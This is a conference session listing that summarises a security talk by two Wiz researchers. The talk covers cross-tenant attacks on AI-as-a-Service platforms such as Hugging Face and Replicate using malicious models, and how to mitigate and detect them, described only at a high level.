Past event

Speaking session

Isolation or Hallucination? Hacking AI Infrastructure Providers for Fun and Weights

Tracks: AI, ML, & Data Science, Cloud Security
,

More and more companies are adopting AI-as-a-Service solutions to collaborate, train and run their artificial intelligence applications. From emerging AI startups like Hugging Face and Replicate, to mature cloud companies like Microsoft Azure and SAP – thousands of customers trust these services with their proprietary models and datasets, making these platforms attractive targets for attackers.

Over the past year, we've been researching leading AI service providers with a key question in mind: How susceptible are these services to attacks that could compromise their security and expose sensitive customer data?

In this session, we will present our novel attack technique, successfully demonstrated on several prominent AI service providers – including Hugging Face and Replicate. On each platform, we utilized malicious models to break security boundaries and move laterally within the underlying infrastructure of the service. As a result, we were able to achieve cross-tenant access to customers' private data, including private models, weights, datasets, and even user prompts. Furthermore, by achieving global write privileges on these services, we could backdoor popular models and launch supply-chain attacks, affecting AI researchers and end-users alike.

Join us to explore the unique attack surface we discovered in AI-as-a-Service providers, and learn how to mitigate and detect the kind of vulnerabilities we were able to exploit.

Speakers

  • Hillai Ben-Sasson

    Senior Security Researcher at Wiz

  • Sagi Tzadik

    Security Researcher at Wiz